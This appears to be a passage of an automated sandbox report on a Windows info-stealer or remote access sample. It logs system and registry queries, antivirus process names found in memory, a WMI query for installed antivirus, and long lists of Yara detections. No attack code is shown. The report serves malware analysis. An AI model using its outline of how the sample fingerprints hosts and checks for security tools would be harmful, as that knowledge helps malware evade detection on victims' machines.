Source: C:\Users\Public\alpha.pif Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\AppVClient.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\Queue\TSTF44A.tmp VolumeInformation
Source: C:\Windows\System32\FXSSVC.exe Queries volume information: C:\ProgramData\Microsoft\Windows NT\MSFax\TSTF45B.tmp VolumeInformation
Source: C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\elevation_service.exe Queries volume information: C:\ VolumeInformation
Source: C:\Program Files (x86)\Mozilla Maintenance Service\maintenanceservice.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\msdtc.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\PerceptionSimulation\PerceptionSimulationService.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\ VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Windows\System32\Locator.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\SensorDataService.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\snmptrap.exe Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\Spectrum.exe Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AF920C GetLocalTime, 4_2_02AF920C
Source: C:\Windows\System32\AppVClient.exe Code function: 22_2_00740080 VirtualFree,VirtualFree,VirtualAlloc,GetUserNameW,GetComputerNameW,GetComputerNameW, 22_2_00740080
Source: C:\Users\user\AppData\Local\Temp\x.exe Code function: 4_2_02AFB78C GetVersionExA, 4_2_02AFB78C
Source: C:\Users\Public\Libraries\wdmvmswJ.pif Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: cmdagent.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: quhlpsvc.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgamsvr.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: TMBMSRV.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: Vsserv.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgupsvc.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: avgemc.exe
Source: x.exe, 00000004.00000002.1590978788.000000007EE07000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1512408583.000000007F1A0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E5B0000.00000004.00001000.00020000.00000000.sdmp, x.exe, 00000004.00000003.1511907585.000000007E637000.00000004.00001000.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 0000001E.00000001.1659980996.0000000001300000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000001.1748961423.0000000000C70000.00000040.00000001.00020000.00000000.sdmp, wdmvmswJ.pif, 00000026.00000002.1813978225.0000000001300000.00000040.00000001.00020000.00000000.sdmp Binary or memory string: MsMpEng.exe
Source: C:\Users\Public\Libraries\wdmvmswJ.pif WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct

Stealing of Sensitive Information

Source: Yara match File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR
Source: Yara match File source: 38.2.wdmvmswJ.pif.1e8fecae.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.29240000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.921.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e730000.1152.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1fd62b90.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e620000.1100.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e790000.1061.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.851.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e720000.1148.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.27a02b90.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e620000.1097.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.1162.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.928.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6b0000.1095.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.918.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.942.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e720000.1150.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.wdmvmswJ.pif.244ea0a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.917.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e5f0000.1165.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.3.wdmvmswJ.pif.1c684410.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e620000.1101.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e770000.1054.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6c0000.1163.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e780000.1056.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6f0000.913.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e750000.1110.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.268b0f08.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e620000.1098.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e730000.1153.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e760000.1002.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e710000.924.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e780000.1057.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.265becae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.1159.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1eb40f08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.265bfbb6.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e790000.1065.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e610000.1096.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.265bfbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1fd62b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1fd45570.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6f0000.843.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e710000.923.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.929.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e770000.1052.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6c0000.1164.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1fd46478.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.268b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.850.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.903.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.279e6478.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.847.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.920.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e790000.1063.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.279e5570.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6f0000.916.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.1158.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6f0000.844.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e8e0cd8.17.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.866.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.1059.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e770000.1051.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000026.00000002.1848536058.000000001FD45000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000003.1663470654.00000000244EA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1777354937.000000002657E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1848938336.00000000213F0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1798010411.0000000029240000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1840076965.000000001E8BE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000003.1553023677.000000001E8E0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1795060712.00000000279E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1840971745.000000001EB40000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1782173123.00000000268B0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000003.1766990632.000000001C684000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1842028459.000000001EDB7000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000026.00000002.1842028459.000000001ED41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000001E.00000002.1782690545.0000000026A57000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR

Remote Access Functionality

Source: Yara match File source: Process Memory Space: wdmvmswJ.pif PID: 2056, type: MEMORYSTR
Source: Yara match File source: 38.2.wdmvmswJ.pif.1e8fecae.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.213f0000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.852.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1eb40f08.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e720000.1151.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.268b0f08.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e760000.1094.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.922.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e750000.1112.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1fd46478.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.213f0000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e610000.1102.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e780000.1055.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1fd45570.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e720000.1149.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e750000.1111.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.904.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.279e5570.11.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e610000.1103.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6f0000.915.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.27a02b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.wdmvmswJ.pif.244ea0a0.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e770000.1053.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.265becae.7.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e760000.1115.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e730000.1154.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.941.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e710000.927.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1eb40000.8.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e790000.1066.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e790000.1064.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e780000.1058.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1eb40000.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6f0000.914.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e760000.1093.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.848.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.1060.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.919.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6d0000.1068.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.3.wdmvmswJ.pif.1c684410.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.865.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.1160.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e710000.845.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1e8fecae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.29240000.13.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e790000.1062.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e710000.846.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.268b0000.9.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e790000.1067.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e760000.1092.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.1161.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e730000.1155.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.853.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.849.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e620000.1099.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e710000.925.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.279e6478.12.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.29240000.13.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.921.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e730000.1152.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1fd62b90.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e620000.1100.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e790000.1061.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.851.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e720000.1148.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.27a02b90.10.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e620000.1097.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.1162.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.928.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6b0000.1095.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.918.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e7a0000.942.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e720000.1150.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.3.wdmvmswJ.pif.244ea0a0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e700000.917.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e5f0000.1165.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.3.wdmvmswJ.pif.1c684410.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e620000.1101.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e770000.1054.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6c0000.1163.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e780000.1056.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6f0000.913.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e750000.1110.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.268b0f08.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e620000.1098.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e730000.1153.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e760000.1002.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e710000.924.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e780000.1057.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.265becae.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.1159.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1eb40f08.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.265bfbb6.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e790000.1065.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e610000.1096.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.265bfbb6.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1fd62b90.10.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1fd45570.12.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6f0000.843.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e710000.923.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e740000.929.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e770000.1052.unpack, type: UNPACKEDPE
Source: Yara match File source: 12.3.wdmvmswJ.pif.1e6c0000.1164.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1fd46478.11.unpack, type: UNPACKEDPE
Source: Yara match File source: 30.2.wdmvmswJ.pif.268b0000.9.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 38.2.wdmvmswJ.pif.1e8ffbb6.6.raw.unpack, type: UNPACKEDPE
